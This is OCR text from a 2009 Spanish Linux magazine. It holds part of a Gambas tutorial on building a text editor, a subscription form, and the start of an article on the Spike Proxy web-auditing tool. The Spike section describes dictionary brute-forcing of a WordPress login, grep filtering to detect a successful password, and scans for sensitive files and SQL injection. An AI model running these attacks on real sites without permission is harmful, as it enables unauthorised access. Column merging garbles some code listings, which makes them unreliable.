ENDIF archivo donde queremos guardar, y qué texto
END queremos guardar en él. En este caso, sería el

es una FUNCION y no un CONTROL, por lo

cual no podemos agregarlos desde el cuadro
de controles. Solo el parámetro Descripción
del Mensaje es obligatorio.
Siguiendo con nuestro Codigo Fuente 3,
se procede a generar una cadena de texto, com-
prendida por la ruta HOME del usuario más el
nombre del archivo introducido en el Input-
Box. En el medio, se concatena la barra inver-
tida (“/”) , para poder generar la ruta completa Figura 9. Aspecto del InputBox con sus parámetros correspondientes

www.lpmagazine.org 79
 programación
Curso de programación en Gambas

Listado 7. Código Fuente 6. Codificando el btnCerrarArchivo procedemos a guardar el archivo, tal como
lo hicimos en el btnGuardar, es decir, con
el método SAVE. Podemos ver que también
PUBLIC SUB btnCerrarArchivo_Click( ) le reasignamos la propiedad text al FMain,
IF ModificoArchivo = TRUE THEN para que nos muestre en la barra de título el
IF Message.Question(''¿Desea guardar las modificaciones?'', nombre del archivo que acabamos de guardar.
''Si'', ''No'') = 1 THEN Vale aclarar que la variable Nombre, declarada
Archivo.Save(RutaArchivo, txtEditorTexto.Text) dentro del evento, solo se puede usar mientras
ENDIF el evento esté activo, es decir, si queremos uti-
ENDIF lizar su valor en otra parte del programa, nos
IF Archivo <> NULL THEN saldrá un cartel de error, informándonos que la
CLOSE #Archivo variable no existe. Esta variable se crea cuando
ENDIF el evento Click se dispara, y muere cuando el
ModificoArchivo = FALSE evento termina.
Fmain.Text = ''Editor de Texto'' Para codificar el btnAbrir, no hace falta
btnGuardar.Enabled = FALSE aplicar muchos más conceptos que los vistos
btnGuardarComo.Enabled = FALSE hasta el momento. Gambas trata que su códi-
btnCerrarArchivo.Visible = FALSE go sea similar al realizar acciones similares,
txtEditorTexto.Enabled = FALSE pudiendose asi, aplicar las mismas técnicas
txtEditorTexto.Text = '' '' dependiendo de una tarea u otra (Ver recuadro
txtEditorTexto.SetFocus ¡Igualdad de Condiciones!). En el Código
END Fuente 5 (Listado 6) podemos observar cómo
quedaría codificado nuestro botón para poder
Listado 8. Codigo Fuente 7. Ultimas codificaciones de nuestros botones abrir un archivo y qué se muestre en nuestro
editor de texto.
PUBLIC SUB Form_Close( ) PUBLIC SUB btnSalir_Click( ) Comparando este código con otros vistos
btnCerrarArchivo_Click( ) btnCerrarArchivo_Click( ) anteriormente, podemos observar que solamen-
QUIT QUIT te difieren en un par de aspectos. Principalmen-
END END te, se procede al ingreso de datos y la valida-
PUBLIC SUB btnDeshacer_Click( ) PUBLIC SUB btnCopiar_Click( ) ción de que realmente exista el archivo que el
txtEditorTexto.Undo txtEditorTexto.Copy usuario quiere abrir, tal cual como lo hicimos
END END anteriormente. Concentrémonos en la apertura
PUBLIC SUB btnRehacer_Click( ) PUBLIC SUB btnPegar_Click( ) del archivo. Como nos indica la sentencia OPEN
txtEditorTexto.Redo txtEditorTexto.Paste RutaArchivo FOR READ WRITE AS #Archi-
END END vo, aquí estamos abriendo un archivo (el que
PUBLIC SUB btnBloquear_Click( ) PUBLIC SUB btnCortar_Click( ) contiene la variable RutaArchivo), para que
IF txtEditorTexto.Enabled = FALSE THEN txtEditorTexto.Cut éste pueda ser leído y escrito, y por último, lo
txtEditorTexto.Enabled = TRUE END asociamos a nuestro descriptor de archivo para
ELSE poder manipularlo. El archivo está abierto para
txtEditorTexto.Enabled = FALSE lectura y escritura, ya que principalmente lo va-
ENDIF mos a leer todo para poder mostrar su contenido
END (READ) y, tal vez, el usuario lo quiera modificar
por lo que también tiene que tener permisos de
Listado 9. Codigo Fuente 8. Todo el código del formulario Fsplash escritura (WRITE).
Para poder mostrar la totalidad del archivo
PUBLIC SUB Form_Open( ) en nuestro txtEditorTexto, hacemos uso de
Fsplash.Center la función EOF (Ver Tabla 5), la cual determina
END si se ha llegado o no al final del archivo. Para
PUBLIC SUB Timer1_Timer( ) saber esta condición, nos valemos de la estruc-
Fsplash.Delete tura WHILE...WEND y del operador de negación
Fmain.Load NOT. Cada vez que recorramos el archivo,
Fmain.Show nos encargamos de leer una línea mediante
END la función LINE INPUT (Ver Tabla 6), la cual
nos extrae una línea del archivo y la almacena
texto almacenado en el control txtEditor- para el archivo, lo almacenamos en una varia- en la variable Linea, declarada al principio
Texto. ble declarada dentro del evento (DIM Nombre de nuestro evento. Luego, el contenido de la
El código del btnGuardarComo es similar AS String), verificamos que la ruta sea válida variable Linea la volcamos al txtEditor-
al de la creación de un nuevo archivo. Es decir, o que no exista el nombre del archivo, y por Texto, sumándole en carácter de salto de linea
le pedimos al usuario que ingrese un nombre último, si todo está correctamente ingresado, y retorno de carro, más conocido como la tecla

80 Linux+ 4/2009

ENTER. De no ponerle este carácter cada vez que
finaliza una línea, veríamos todo el contenido
de nuestro archivo como una larga fila de carac-
teres. Para ello, se hace uso de la función Chr, el
cual se le pasa como parámetro el código ASCII
(Ver Cuadro ¿Que es el código ASCII?) y retor-
na su equivalencia como carácter.
Gambas es un lenguaje de programación,
y como todo lenguaje, se puede traducir. Para
entender mejor el recorrido de nuestro archivo,
que mejor que traducirlo y leerlo en nuestro
idioma. Nuestro código de lectura de un archi-
vo se leería de la siguiente manera:
Mientras que no termine el archivo (WHILE
NOT Eof (Archivo), leer una línea del archivo
y guardarla en la variable 'Linea' (LINE
INPUT #Archivo, Linea). Luego, el contenido
de nuestro Editor de Texto, es igual a su con-
tenido anterior, sumándole la nueva línea y un
carácter ENTER (txtEditorTexto = txtEditor-
Texto + Linea + Chr(13))
Pasemos ahora a codificar el btnCerra-
rArchivo, para ello miremos el Código Fuente
6 (Listado 7). Al iniciar el evento clic, verifica-
Condicion
Codigo si es
Codigo si es
Verdadero Falso
Figura 10. Creacion de un nuevo formulario que actuara como Splash
Condicion
Codigo si es Codigo si es
Verdadero Falso
Figura 11. Indicanmos el formulario de inicio para nuestra aplicación
Condicion
Codigo si es Codigo si es
Verdadero Falso
Figura 12. Aspecto de un MessageBox en distintas librerías. Arriba QT de KDE y abajo GTK+ de GNOME
mos si se ha modificado el archivo evaluando el
valor de la variable ModificoArchivo, declarada
al principio del programa. De ser verdadero, le
preguntamos al usuario, mediante un Message-
Box, si antes de cerrar el archivo quiere guardar
las modificaciones realizadas. De apretar en el
botón SI, nos encargamos de guardar el archivo
invocando al método SAVE, usado anterior-
mente.
La función MessageBox, retorna valo-
res para poder evaluarlos, según la posición
donde se encuentre el botón ubicado en el
cuadro de mensaje. Como ejemplo, nuestro
boton Sí, se encuentra en la primera posición
(es el primer boton del MessageBox), es por
ello que si el usuario aprieta en ese botón,
se retornará el valor 1, que será evaluado
por la estructura IF... END IF. Siendo así
que, si el usuario apretase en el botón No, la
función retornaría el valor 2, ya que es ésta
la posición donde se encuentra ubicado en el
MessageBox.
Acto seguido, nos encargamos de veri-
ficar si en la Variable Archivo se encuentra
www.lpmagazine.org
programación
Curso de programación en Gambas
algún archivo asociado. Si ésta es diferente
de NULL, quiere decir que hay algún archivo
asociado a nuestro descriptor, y es por ello
que lo cerramos mediante la sentencia CLO-
SE. Al cerrar el archivo, tenemos que restau-
rar el valor de la variable ModificoArchivo
a FALSE, así se podrá volver a utilizar con
los valores por defecto en otro archivo que
abramos.
Una vez realizados estos cambios, res-
tauramos los valores del editor y sus botones
como si se hubiese iniciado nuevamente el
editor, quedando a la espera de que se abra o
cargue otro archivo para poder trabajar.
Los últimos pasos para que nuestro
editor quede funcionando se muestran en el
Código Fuente 7 (Listado 8). Como sabemos,
los controles de Gambas nos proveen de
propiedades y métodos que nos facilitarán
de muchas tareas, obviamente si elegimos
el control adecuado para el trabajo que
queremos realizar. Nosotros para la edición
del texto, elegimos el control TextArea (tx-
tEditorTexto), que nos provee de muchos
métodos ya incluidos para hacer más fácil
la edición de texto. Estos métodos son Undo
(Deshacer), Redo (Rehacer), Cut (Cortar),
Copy (Copiar), Paste (Pegar), y muchos más.
Por ello creo que no hace falta de explica-
ción adicional, ya que estos métodos reali-
zan las tareas tal cual como su nombre in-
dica. Podemos aclarar el funcionamiento de
solo algunos eventos.
El evento Close del FMain, se encarga de
llamar al evento Click del btnCerrarAr-
chivo, ya que cuando cerramos el formu-
lario, nos tenemos que encargar de verificar
si hay algún archivo abierto, y de ser así,
que guarde sus modificaciones, tal cual
como está codificado en el evento Click del
btnCerrarArchivo. Este código, es un ade-
lanto de lo que veremos la próxima entrega
de este curso, el tema de Procedimientos
y Funciones, que nos ahorrarán la tarea de
reescribir código de forma innecesaria. Una
vez llamado al evento, cerramos el progra-
ma mediante la sentencia QUIT.
El botón btnBloquear, se encargará de
bloquear/desbloquear nuestro editor cada vez
que lo llamemos, es decir, cuando esté blo-
queado no podremos modificar el texto que
se encuentra en él. Simplemente el funciona-
miento de este botón se remite en evaluar si
el editor está bloqueado o no. Si está bloquea-
do, lo desbloqueamos, y si está desbloquea-
do, lo bloqueamos. Así, nuestro botón actúa
de una u otra forma, según el estado en que
se encuentre, expresado por la propiedad
ENABLED.
81
 programación
Curso de programación en Gambas
Sobre el autor
Jorge Emanuel Capurro es estudiante de
la Tec. Superior en Programación, carrera
dictada en la Universidad Tecnológica
Nacional – Facultad Regional Haedo, pro-
vincia de Buenos Aires, Argentina. Prin-
cipalmente, su área de investigación se
centra en los Sistemas Operativos de tipo
UNIX y de la programación bajo esta pla-
taforma. Es el creador del proyecto IDEas
(http://ideasc.sourceforge.net), que es el
primer frontend desarrollado bajo Gambas
del compilador gcc (http://gcc.gnu.org), que
se utiliza con fines didácticos. Actualmen-
te se desempeña como programador para
la empresa IBM Argentina en el departa-
mento de Applications Management Ser-
vices, participando de diversos proyectos
de desarrollo de software de carácter
internacional.
Creando un Splash
para nuestra aplicación
Un formulario del tipo Splash, es aquel que
se utiliza a modo de presentación de nuestro
programa. Para crearlo, necesitamos agregar un
nuevo formulario en la pantalla. Nos dirigimos
a la barra de exploración de proyecto, y hace-
mos click derecho sobre la carpeta Formula-
rios. Nos dirigimos a Nuevo -> Formulario, tal
cual como lo muestra la Figura 10. Gambas nos
pedirá que ingresemos un nombre para él. Lo
llamamos FSplash. Para darle una verdadera
estética de formulario Splash, le asignamos las
siguientes propiedades:
• Border = Fixed,
• SkipTaskBar = True.
La propiedad SkipTaskBar, nos indica si el
formulario aparecerá o no en la barra de apli-
caciones de nuestro GNU/Linux. Como es
un formulario que no se podrá minimizar, le
asignamos el valor TRUE. La propiedad Bor-
der -como su nombre lo indica- le asignará
un borde distinto al formulario. Por último,
dentro del evento Open de nuestro FSplash,
invocamos al método Center del mismo,
para que nos centre el formulario en nuestra
pantalla.
Este formulario mostrará la información
de nuestro programa unos segundos, y luego
invocará al editor de texto. Para ello, nos va-
lemos del ya conocido control Timer. Le asig-
naremos a éste la tarea de que, cuando pasen
5 segundos, cierre el formulario de Splash,
e invoque al formulario principal. Entonces,
82
las propiedades de nuestro control Timer se- Ejercicios Propuestos
rán las siguientes: En esta sección se le deja al lector unos ejer-
cicios para poder ir practicando con Gam-
• Enabled = True, bas:
• Delay = 5000.
• Crear una aplicación que me muestre el
En el evento Timer de nuestro control, escri- contenido de un archivo introducido por
bimos el Código Fuente 8 (Listado 9), que nos InputBox, pero que no me permita modi-
muestra el código resultante de nuestro FS- ficarlo.
plash. Este código, en primera instancia, cuan- • Crear en la aplicación Editor de Texto,
do se cumplen los 5 segundos asignados en el tres botones laterales que contengan los
Timer, se encarga de eliminar el formulario de nombres de tres colores diferentes, y que
Splash (FSplash.Delete), cargar el formulario al seleccionar un color, se aplique al tex-
FMain en la memoria (FMain.Load), y luego to contenido en txtEditorTexto. Pista:
mostrarlo en la pantalla (FMain.Show). Investigar la propiedad ForeGround y la
Por último, lo que nos falta en indicarle función Color.
a Gambas que nuestro primer formulario a ini- • Agregar 2 botones a la barra de herra-
ciar va a ser el FSplash, y no el FMain como lo mientas que me permitan seleccionar/
hacíamos anteriormente. Para ello, nos dirigi- desseleccionar todo el texto de txtEdi-
mos al explorador de proyectos, y hacemos clic torTexto. Pista: Investigar sus métodos.
derecho sobre el formulario FSplash, y elegi- • Modificar el FSplash para que me apa-
mos la opcion Clase de Inicio (Ver Figura 11). rezca el nombre de usuario cuando eje-
¡Listo! Ya podemos probar nuestra aplicación, cuto el programa. Pista: Ver la anterior
verificando que todo funcione correctamente. entrega del curso.
Recuerda que también puedes empaquetarla • Modificar el editor de texto para que,
y crearle un instalador para distribuirla entre cuando un documento esté abierto y to-
tus amigos, tal cual como lo vimos la entrega davía no se le hayan realizado modifica-
anterior de este curso. ciones, el botón de Guardar esté deshabi-
litado. Solo es válido para un documento
¿QT o GTK+? ya existente, no uno que se recién creó.
Como mencioné en la primera entrega del cur- Pista: Explorar el código fuente del editor
so, Gambas permite cambiar entre QT (KDE) de texto.
o GTK+ (GNOME) sin modificar una sola línea
de código. Para poder aprovechar esta funcio- Conclusiones
nalidad, nos dirigimos al menú Proyecto –> En esta segunda entrega del Curso de Gam-
Propiedades, y luego a la pestaña Componen- bas, hemos recorrido todas las estructuras
tes. Aquí es en donde erigiremos las librerías necesarias del lenguaje BASIC para poder
que queramos que nuestra aplicación utilice. realizar aplicaciones profesionales bajo Gam-
Uno de los componentes más interesantes es el bas. También, hemos visto lo sencillo que
componente gb.gui. El componente gb.gui, es manipular archivos de texto en Gambas,
que es el encargado de hacer que nuestra apli- simplemente utilizando un par de funciones.
cación sea totalmente multiescritorio, ya que se En la próxima entrega del curso, veremos
encarga de detectar qué entorno estamos usando cómo modularizar el código fuente mediante
(KDE o GNOME), y cargar las librerías nece- Procedimientos y Funciones para que esto no
sarias en tiempo de ejecución. Este componen- suceda, además de otras características inte-
te es esencial a la hora de realizar aplicaciones resantes que hacen de Gambas un excelente
multiescritorio. Pero supongamos que en esta lenguaje de programación.
ocasión queremos que nuestra aplicación so- Se recomienda al lector repasar y tratar de
lamente tenga el aspecto de la librería QT. Para entender cómo está verdaderamente trabajan-
ello, desmarcamos de la lista el componente do el código fuente que nosotros escribimos,
gb.gui y marcamos el componente correspon- con el motivo de poder comprenderlo mejor.
diente, en nuestro caso el gb.qt. Al contrario, si No tenga miedo, estúdielo, modifíquelo y eje-
queremos que nuestra aplicación se ejecute con cútelo las veces que sea necesario. Esto le
las librerías GTK+, marcamos el componente ayudará a aprender más y mejor. No olvides
gb.gtk. Como es obvio, las librerías gb.gtk que puedes dejar tus comentarios, dudas
y gb.qt no son compatibles entre si, para ello se o consultas a jorge.capurro@linuxmail.org.
utiliza el gb.gui. ¿Sencillo, verdad? La Figura Espero que les haya sido de agrado este en-
12 nos muestra la ejecución de un MessageBox, trega y nos vemos en la próxima entrega del
dependiendo de la librería que se utilice. Curso ¡Hasta Pronto!
Linux+ 4/2009
Pedido de suscripción

Por favor, rellena este cupón y mándalo por fax: 0048 22 244 24 59 o por correo: Software-Wydawnictwo Sp. z o. o.,
Bokserska 1, 02-682 Varsovia, Polonia; e-mail: suscripcion@software.com.pl

Nombre(s) ................................................................................................... Apellido(s) ..................................................................................................

Dirección ..............................................................................................................................................................................................................................

C.P. .............................................................................................................. Población ....................................................................................................

Teléfono ..................................................................................................... Fax ...............................................................................................................

Suscripción a partir del No ...................................................................................................................................................................................................

e-mail (para poder recibir la factura) ..................................................................................................................................................................................

o Renovación automática de la suscripción

Título
número de
a partir
ejemplares número de Precio
del número
al año

Linux+DVD (1 DVD)
12 69 €
Mensual con dos DVDs dedicado a Linux

En total

Realizo el pago con:

□ tarjeta de crédito (EuroCard/MasterCard/Visa/American Express) nO CVC Code
Válida hasta
□ transferencia bancaria a BANCO SANTANDER CENTRAL HISPANO
Número de la cuenta bancaria: 0049-1555-11-221-0160876
IBAN: ES33 0049 1555 1122 1016 0876
código SWIFT del banco (BIC): BSCHESMM Fecha y firma obligatorias:
 práctica
Spike Proxy

Spike Proxy
David Álvarez García
Spike Proxy forma parte de la suite SPIKE, un proxy para el
protocolo Http / Https de código abierto usado para analizar las
aplicaciones web que nos interesen y su comunicación con los
clientes (navegadores); aplicación muy útil para desarrolladores
y para entusiastas de la seguridad.

U
n programa muy similar a Spike Proxy en dedicarle unas líneas a esta herramienta comentando sus ca-
linux@software.com.pl

Windows es el popular Odysseus. Este proxy
puede correr en local o bien servir a otros hosts
de la red, pero no es un software dedicado a
ofrecer comunicaciones http a determinados hosts, entre otras
cosas, porque carece del 99% de las opciones que un proxy
web decente debería tener para esa finalidad. Su objetivo
prioritario es el análisis de las páginas webs; se encarga de
estudiar el tráfico Http / https generado entre un navegador
y una determinada web. Todas las peticiones y respuestas
pasan por él. La funcionalidad que hace interesante a esta
herramienta es que permite repetir y editar solicitudes ya
realizadas, algo sin duda muy útil para los programadores
web. Como extra, Spike ofrece la posibilidad de hacer algu-
nos test de seguridad como inyecciones Sql, Xss, overflow,
directorios transversales y alguna otra cosa relacionada con
vulnerabilidades, pero sin duda tenemos mejores herramien-
tas orientadas a ese fin para GNU/Linux.
racterísticas y funcionamiento. Toda su administración está
basada en entorno web, al dejar spike arrancado, configurar
el navegador y dirigirse con él a la dirección http://spike,
se podrá acceder a dicho panel y empezar a auditar el tráfico
de los clientes que estén usando nuestro ordenador como
proxy para navegar, por norma será el mismo ordenador
que tiene el proxy instalado, es decir en local, recordemos
que su uso está orientado a estudiar el tráfico y no a ofrecer
servicio de proxy web.
Descarga
e instalación de Spike Proxy
Se puede descargar Spike Proxy de la siguiente dirección:
http://www.immunitysec.com/resources-freesoftware.shtml.
No requiere compilación / instalación, sólo hay que des-
comprimir el fichero .tgz, entrar en la carpeta y ejecutar el
script spkproxy.py:

Primros pasos con Spike $ tar -zxvf SP148.tgz

Spike está escrito en Python y su documentación, por sor- $ cd spkproxy/
prendente que parezca, es inexistente, razón de más para $ ./spkproxy.py

84 Linux+ 4/2009

Una vez arrancada la aplicación, nos dirigimos
a nuestro navegador y le indicamos que se dirija
a la url http://spike para empezar a ver cómo
funciona el panel de administración, que no es
más que un un html con varios frames como
vemos en la Figura 1:
• Frame inferior: Muestra el log, es don-
de veremos los resultados de ciertos
ataques y acciones que realicemos con
Spike.
• Frame central: Muestra una base de datos
ordenada por dominios con las comunica-
ciones capturadas desde que arrancamos
por primera vez la aplicación, esto nos
permite poder trabajar sobre ellas en
cualquier momento.
• Frame superior: Número de versión del
Proxy.
• Frame izquierdo: Es el menú de admi-
nistración, en él seleccionamos lo que
queremos hacer. Las opciones que tiene
son las siguientes:
– Request cache: Muestra las solicitu-
des / respuestas realizadas desde que
se arrancó el proxy
– Help: Ofrece al usuario una pequeña
ayuda sobre el uso del panel, no dice
nada que no vayamos a contar.
– Stop All Actions: Si estamos realizan-
do algún escaneo de vulnerabilidades,
lo para.
– Allow actions again: Vuelve a per-
mitir la realización de exploraciones
de seguridad después de parar alguna
actividad.
– Configure SPIKE Proxy: Permite
configurar determinados parámetros
de la configuración.
Configuración
del navegador
Las solicitudes idénticas no se guardan para
no repetir información inútilmente. Vamos
a ver ahora cómo configurar el navegador
y cómo usar la opción que más nos interesa
de Spike, la de poder analizar y experimentar
con las conexiones http que realicemos.
Configurar Mozilla Firefox para usar Spike
Proxy:
• Arrancamos Firefox,
• Nos dirigimos a Editar –> Preferencias –>
Avanzado –> Configurar conexión a In-
ternet,
• Activamos Configuración Manual del
proxy,
• En Proxy HTTP usamos la IP 127.0.0.1
y el puerto 8080. Figura 1. Panel de administración de Spike
práctica
Spike Proxy
Listado 1. Pulsando sobre Request Cache en el menú de administración
* Request: POST25682954217020HTTPA1.1200491756_www.dominio.com
Print Request Info, rewrite request, Display Response,
crawl, argscan, dirscan, overflow VulnXML Tests
* Request: GET256829542HTTPA1.1200468816_www.dominio2.com
Print Request Info, rewrite request, Display Response,
crawl, argscan, dirscan, overflow VulnXML Tests
* Request: GET188229542HTTPA1.1404436566_www.dominio3.com
Print Request Info, rewrite request,
Display Response, crawl, argscan,
dirscan, overflow VulnXML Tests
Listado 2. Ejemplo del comando Print Request Info
Site: www.dominio.com
Port: 80
SSL: No
POST /wp-login.php HTTP/1.1
Host: www.dominio.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.dominio.com/wp-login.php
Cookie: comment_author_email_442228cc19b60238770c826d73335fa1=MAIL%40ma
il.com; subscribe_checkbox_442228cc19b60238770c826d73335fa1=unchecked;
comment_author_442228cc19b60238770c826d73335fa1=NOMBRE
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
log=Administrador&pwd=Contrase
%C3%B1aAdminitrador&submit=
Login+%C2%BB&redirect_to=wp-admin%2F
www.lpmagazine.org 85
 práctica
Spike Proxy

Analizando nuevo la solicitud, pero variando alguno
el tráfico HTTP / HTTPS o todos parámetros (Navegador, Url, Post,
Al pulsar sobre Request Cache en el menú de Get, Encoding,Cookie,...). Estos formula-
administración podremos ver una salida pareci- rios de Rewrite request están divididos en
da a la que está presentada en el Listado 1. secciones:
Cada línea es una solicitud a un sitio http – 1ª Parte: Objetivo (Listado 3).
realizada por el proxy, ésta incluye también su – 2ª Parte: Cabeceras Http (Listado 4).
respuesta como veremos a continuación. Los – 3ª Parte: URL Args (Variables pasadas
campos son los siguientes: mediante GET). En nuestro ejemplo
propuesto, el método usado para en-
• Print Request Info: Muestra la solicitud del viar variables era POST, por eso en la
cliente en texto plano, veamos un ejemplo imagen no se ve nada en esos formu-
en el Listado 2. larios de la sección URL Args.
• Rewrite request: Ésta es una de las opcio- – 4ª Parte: Body Args (Variables pasadas
nes más interesantes, al pulsar sobre ella mediante POST) (Listado 5).
se visualizan un buen número de formu-
larios con todo el contenido de la solicitud Si queremos usar una de las variables para
anteriormente visualizada en Print Request realizar inyecciones, usaremos la opción In-
Info. Esto nos permite editar y reenviar de jectionscan que encontramos en la sección
de Request Cache.
Si queremos realizar fuerza bruta contra
una variable de las que vemos en los for-
mularios de rewrite request, por norma la
encargada de enviar la contraseña o el usua-
rio, usaremos la opción password. Al ejecutar
los ataques se puede visualizar en la terminal
donde está arrancado spike Proxy, los paque-
tes que estamos enviando al servidor y sus
respuestas en tiempo real. Si nos fijamos en
las solicitudes mientras realizamos el ataque
de fuerza bruta, veremos líneas como las pre-
sentadas en el Listado 6.
Como se aprecia, la variable pwd va cam-
biando de valor, que es lo que nosotros quería-
mos. El valor de las variables las saca de los
diccionarios que encontramos en el directorio
de spike (allwords, words y passchecklist).
Pero este ataque debemos saber que no es muy
fiable, ya que tal y como trabaja este proxy,
puede encontrar la clave correcta para un de-
terminado usuario y que no se reporte como
encontrada.
Para asegurarnos que la fuerza bruta
funciona correctamente en nuestra página de
autenticación y no ofrecerá falsos positivos,
podemos añadir la clave auténtica en algu-
nos de los ficheros como prueba de concepto
y estudiar qué sucede. Lo mejor sería fijarse
en la salida de la consola al ejecutar spike,
prestar atención a qué es lo que muestra cuan-
do acierta la clave, qué es lo que nos dice la
respuesta del server, ver en qué difiere con las
demás respuestas fallidas y así poder filtrarla.
Por defecto usa el fichero allwords. Veamos
un ejemplo de acierto de contraseña en wor-
dpress, todo en la consola donde tenemos el
proxy arrancado (Listado 7).
Spike no avisará que se descubrió la
contraseña (mipassword) aunque en este caso
la haya acertado, pero si en consola filtramos
con grep de forma simple, una vez tengamos
identificada la respuesta del server web al in-
troducrir la contraseña correcta, podremos ver
si nuestro ataque de fuerza bruta resulto exitoso

Listado 3. Objetivo, primera parte del formulario de Rewrite request

Verb: Post
ConnectHost: www.dominio.com
ConnectPort: 80
URL: /wp-login.php
SSL:

Listado 4. Cabeceras Http, segunda parte del formulario de Rewrite request

Host: www.dominio.com
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Keep-Alive: 300
...
Content-Type: application/x-www-form-urlencoded

Listado 5. Body Args, cuarta parte del formulario de Rewrite request

pwd=Contrase%C3%B1aAdminitrador
log=Administrador
submit=Login+%C2%BB
redirect_to=wp-admin%2F
BodyArg0: pwd: ContraseñaAdministrador
Entry Actions: INJECTIONSCAN PASSWORD

Figura 2. Formularios de Rewrite request

86 Linux+ 4/2009
 práctica
Spike Proxy

o no. Para el CMS wordpress podríamos usar el

siguiente comando, basado en la salida mostra-
da anteriormente:

$ ./spkproxy.py | grep -i --before=30

"wp-admin/" | grep -i "pwd="
log=admin&pwd=mipassword&wp-submit=
Iniciar+Sesi%C3%B3n&redirect_to=
wp-admin%2F&testcookie=1

Como vemos, aunque Spike no reporte como

correcta la contraseña, nosotros podemos in-
tervenir y usar la salida que muestra el proxy
en consola para encontrarla. La otra opción
que se nos muestra al lado de password, es la
opción injectionscan, que realiza ataques de
inyecciones sql con esa variable y desde luego,
como en el caso anterior de fuerza bruta, sus
resultados no son muy fiables. Habiendo expli- Figura 3. Las solicitudes que muestra la consola cuando usamos la opción Overflow

Listado 6. Realizando el ataque de fuerza bruta cado anteriormente la parte más importante de
Spike, pasemos a comentar las otras opciones
log=Administrador&pwd=NR&submit= que nos ofrece.
Login+%C2%BB&redirect_to=wp-admin%2F
log=Administrador&pwd=BizTalkTracking&submit= Buscando Bugs
Login+%C2%BB&redirect_to=wp-admin%2F de seguridad en una
log=Administrador&pwd=Printers&submit= determinada aplicación Web
Login+%C2%BB&redirect_to=wp-admin%2F Volvemos a la parte de Request Cache y vere-
log=Administrador&pwd=PBSData&submit= mos en qué consisten las opciones restantes:
Login+%C2%BB&redirect_to=wp-admin%2F Display Response, crawl, argscan, dirscan,
... overflow VulnXML Tests.

Listado 7. Un ejemplo de acierto de contraseña en Wordpress Display Response

Muestra la respuesta generada por el servidor.
Trying to connect to www.dominio.com:80
Si vemos caracteres extraños, es que la res-
Sent request:
puesta del servidor está comprimida en gzip,
POST /wp-login.php HTTP/1.1
por desgracia no lo descomprime para poder
Host: www.dominio.com
visualizar el código html. De todas maneras po-
...
demos usar la opción Rewrite request y borrar
log=admin&pwd=mipassword&wp-submit=
la flag que indica el uso de gzip.
Iniciar+Sesi%C3%B3n&redirect_to=wp-admin%2F&testcookie=1
Response Header:
Crawl
...
Intenta sacar el árbol de los directorios y fiche-
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
ros accesibles en la web, esto lo hace usando
Set-Cookie: wordpress_07dbbf9c90dda5f33116b13fba6ac48e=admin%7C12331064s3%
y siguiendo los links del sitio web.
7C6b7414113afef8162e9ddadb11b98b24; path=/
Location: wp-admin/
Argscan
Content-Length: 0
Cuando estemos utilizando peticiones con va-
Connection: close
riables (GET / POST), podremos usarlas para
Content-Type: text/html; charset=UTF-8
realizar pruebas de Inyecciones Sql con ellas.

Listado 8. Un ejemplo del reporte mostrado por dirscan

Dirscan
log: [Mon Jan 19 16:15:07 2001] : Done with directory scan on / Esta opción realiza un buen número de solici-
www.dominio.com_80_0/...886_www.dominio.com tudes al servidor en busca de determinados fi-
Log: [Mon Jan 19 16:14:17 2001] : Found directory! */footer.pl/* cheros y directorios que puedan ser inseguros
Log: [Mon Jan 19 16:14:16 2001] : Found directory! */header.pl/* o explotables (/admin, global.asa,..). Esta op-
Log: [Mon Jan 19 16:14:14 2001] : Found directory! */.htpasswd/* ción se basa para encontrar los ficheros, en los
Log: [Mon Jan 19 16:14:05 2001] : Starting directory scan on tipos de error que devuelve un servidor http
cuando se le solicita un archivo que no alberga

www.lpmagazine.org 87
 práctica
Spike Proxy

o no es accesible. Al haber variedad en los tipos usamos esta opción. Veamos un ejemplo del dirscan realmente tiene un funcionamiento
de respuestas que un servidor puede enviar para reporte mostrado por dirscan (Listado 8). tan pésimo que no es nada fiable y no se reco-
reportar un tipo de solicitud fallida, podemos NOTA: En nuestro caso, los tres ficheros mienda su uso.
encontrarnos con varios falsos positivos si reportados son falsos positivos. La opción
Overflow
Listado 9. Buscando ficheros comprometidos Como su propio nombre indica, esta opción
usa variables de gran tamaño para testear la
# Petición de Spike: aplicación web. Para poder usar esta opción
Trying to connect to www.dominio.com:80 debemos dirigirnos a una solicitud http que in-
Sent request: cluya variables, ya sea usando el método GET
GET /.bash_history HTTP/1.1 o POST. Veamos una imagen de las solicitudes
Host: www.dominio.com que muestra la consola cuando usamos dicha
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob) opción (Figura 3).
Accept: text/xml,application/xml,
application/xhtml+xml,text/html;q=0.9, VulnXML Tests
text/plain;q=0.8,image/png,*/*;q=0.5 Intenta explotar un conjunto de vulnerabili-
Accept-Language: en-us,en;q=0.5 dades conocidas (Whisker/Nikto) usando una
Accept-Encoding: gzip,deflate base de datos con un sinfín de ataques cono-
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 cidos y preparados para ser lanzados.
Keep-Alive: 300
Connection: keep-alive ¿Falsos positivos?
Cookie: lang=spanish El proxy Spike es propenso a falsos positivos
# Respuesta servidor: cuando usamos sus funcionalidades de testeos
Response Header: de seguridad, que como sabemos tampoco es
HTTP/1.1 302 Found su punto fuerte. Por eso se deben interpretar
Date: Mon, 19 Jan 2009 15:54:00 GMT sus resultados como suma cautela, el proxy
Server: Apache basa el éxito de sus tests realizados en los
Location: http://www.dominio.com/error.php mensajes http que devuelve el servidor (có-
Content-Length: 223 digos de estado) y ese es el problema, porque
Keep-Alive: timeout=3, max=1000 las respuestas frente a una misma solicitud
Connection: Keep-Alive fallida pueden depender del CMS usado y su
Content-Type: text/html; charset=iso-8859-1 configuración.
Códigos de estado de Http los podréis
Listado 10. VulnXML Tests encontrar aquí: http://es.wikipedia.org/wiki/
Anexo:C%C3%B3digos_de_estado_HTTP.
[01/Feb/2009:19:52:53 +0100]
Para explicar el por qué de estos falsos
"GET /scripts/tools/getdrvrs.exe HTTP/1.0" 404 224
